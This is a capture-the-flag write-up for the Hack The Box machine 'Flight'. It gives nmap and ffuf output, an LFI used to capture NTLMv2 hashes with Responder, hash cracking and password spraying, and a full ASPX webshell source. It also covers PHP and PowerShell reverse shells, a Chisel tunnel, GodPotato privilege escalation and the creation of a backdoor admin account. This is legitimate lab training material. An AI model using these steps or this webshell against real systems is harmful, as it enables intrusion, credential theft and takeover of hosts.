Flight: Write-Up

This is a Write Up on how to complete the room Flight on Hack The Box.

Note* I used Kali Linux to complete this room. The IP Address for Flight was at the time of this writing.

* Click on images to enlarge.

Let’s begin this room by enumerating Flight with Nmap.

Running the command:

nmap -sT -v -Pn -p- displays several open ports.

nmap -sT -v -Pn -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-07 08:24 EDT
Initiating Parallel DNS resolution of 1 host. at 08:24
Completed Parallel DNS resolution of 1 host. at 08:24, 0.05s elapsed
Initiating Connect Scan at 08:24
Scanning [65535 ports]
Discovered open port 139/tcp on
Discovered open port 53/tcp on
Discovered open port 445/tcp on
Discovered open port 80/tcp on
Discovered open port 135/tcp on
Discovered open port 5985/tcp on
Discovered open port 49720/tcp on
Connect Scan Timing: About 20.51% done; ETC: 08:27 (0:02:00 remaining)
Discovered open port 88/tcp on
Discovered open port 3268/tcp on
Connect Scan Timing: About 48.83% done; ETC: 08:26 (0:01:04 remaining)
Discovered open port 49674/tcp on
Discovered open port 49744/tcp on
Discovered open port 464/tcp on
Discovered open port 389/tcp on
Discovered open port 593/tcp on
Discovered open port 49673/tcp on
Discovered open port 9389/tcp on
Discovered open port 3269/tcp on
Discovered open port 636/tcp on
Discovered open port 49667/tcp on
Completed Connect Scan at 08:26, 104.42s elapsed (65535 total ports)
Nmap scan report for
Host is up (0.041s latency).
Not shown: 65516 filtered tcp ports (no-response)
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49720/tcp open  unknown
49744/tcp open  unknown

Navigating to the website on port 80 reveals an airlines website.

Observing the footer it appears we can use the hostname flight.htb.

We can update the /etc/hosts file with the following input. flight.htb

Now we can view the website flight.htb.

Enumerating the website doesn’t reveal anything of interest. The next step will be enumerating for other vhosts. We can accomplish this with ffuf.

ffuf -w /usr/share/wordlists/seclists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.flight.htb" -u http://flight.htb  -fs 7069

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       


 :: Method           : GET
 :: URL              : http://flight.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.flight.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 7069

school                  [Status: 200, Size: 3996, Words: 1045, Lines: 91, Duration: 50ms]

It appears we have discovered another vhost. We can add this to our /etc/hosts as well. flight.htb school.flight.htb

Enumerating the website reveals the application is using a parameter to load a file from the host. We can try and abuse this to get local file inclusion (LFI).

Using intruder and the wordlist LFI-gracefulsecurity-windows.txt from Seclists we can see that we do have the ability to read files on the host.

By attempting to abuse this exploit we can use Responder and try to receive an NTLMv2 Hash from the host.

In this exploit I am using // to try to have the host connect to my Kali host and attempt to find /test.txt while using Responder to listen for incoming connections.

It appears we are successful and have received a hash from the target host.

We can now try to crack the hash with John the Ripper and rockyou.txt.

We are successful in cracking the hash and have credentials for svc_apache.

Attempting to use the credentials see we are able to read the contents of Web share on the target host.

Here we can try and upload a PHP file to the share. Attempting to upload a malicious PHP file appears to fail.

Our next step will be to enumerate the users on the system with crackmapexec and the svc_apache credentials.

Now that we have a list of users we can see if any of them are using the same password as svc_apache. iT It looks like we got a hit with S.Moon.

Comparing the two users, it seems that S.Moon can write to the Shared share while the svc_apache user cannot.

It is possible with the Write permission on the Shared share that we can upload files to the host and possibly obtain more credentials. Using ntlm_theft we can generate multiple files and attempt to upload them to the target. Note that the IP in the snippet is my Kali Host. You will need to provide your Kali host IP Address for this to work.

sudo python3 ntlm_theft.py -g all -s -f test

Connecting to the target with SMB we can upload the files using:

mput *

Back at our Responder we see another NTLMv2 Hash come in from a c.bum user.

We are again successful at cracking the hash for c.bum using John the Ripper and rockyou.txt.

Using our new set of credentials we can see we have Read and Write to the Web Share.

We will upload a php file that will give us remote code execution. We will use revshells.com to help us get the PHP code we need.

Lastly, we just need to put the file onto the target host using:

put reverse.php

Navigating to the reverse.php we can see we have an input prompt and can execute code.

Using revshells.com again we can get a PowerShell reverse shell script.

Here we have a netcat listener and have caught a shell from the target host, and we are the user svc_apache.

We are able to navigate to the C.Bum Desktop and obtain the user.txt file.

Our next step is privilege escalation.

Enumerating the system we find port 8000. This port was not part of the external Nmap scan.

We can use Chisel to setup tunneling to this service and view it in the web browser. First we need to upload the executable to our target host.

Next we need to use the executable and setup the client.

Finally, we setup the server and configure to allow incoming connections.

Now we are able to view the site with http://localhost:8000.

Because we can now access this site we should be able to upload another malicious file into the web directory and give us remote code execution.

Uploading a shell.aspx file allows us to obtain remote code execution and we can now attempt to catch another shell.

We can use the following aspx shell from this GitHub Repo.

<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
string ExcuteCmd(string arg)
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
return s;
void cmdExe_Click(object sender, System.EventArgs e)
<title>awen asp.net webshell</title>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="execute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>

<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!--    http://michaeldaw.org   04/2007    -->


Using netcat again we can listen and intercept the shell from the target host using the same PowerShell Script from before.

Checking the privileges of our user we can see we have SEImpersonatePrivilege. With the current build of our target Windows host we can attempt a Potato attack called GodPotato.

Uploading the GodPotato Executable onto the system we are able to use it, and we can run the executable as “nt authority\system”.

.\GP.exe -cmd "cmd /c whoami"

With this functionality and these privileges we can create a new user and put them in the local administrators group.

.\GP.exe -cmd "cmd /c net user /add Jarrod Password123"

.\GP.exe -cmd "cmd /c net localgroup administrators Jarrod /add"

All that is left to do now is connect to the host. We can use psexec to accomplish this.

impacket-psexec Jarrod:password123@flight.htb

We are now connected to the box and because we are in the local administrators group we can get to the Administrators Desktop and read root.txt.

That completes the room! Well done! If you found this helpful, please send me a tweet and tell me what you thought! Feedback is always appreciated!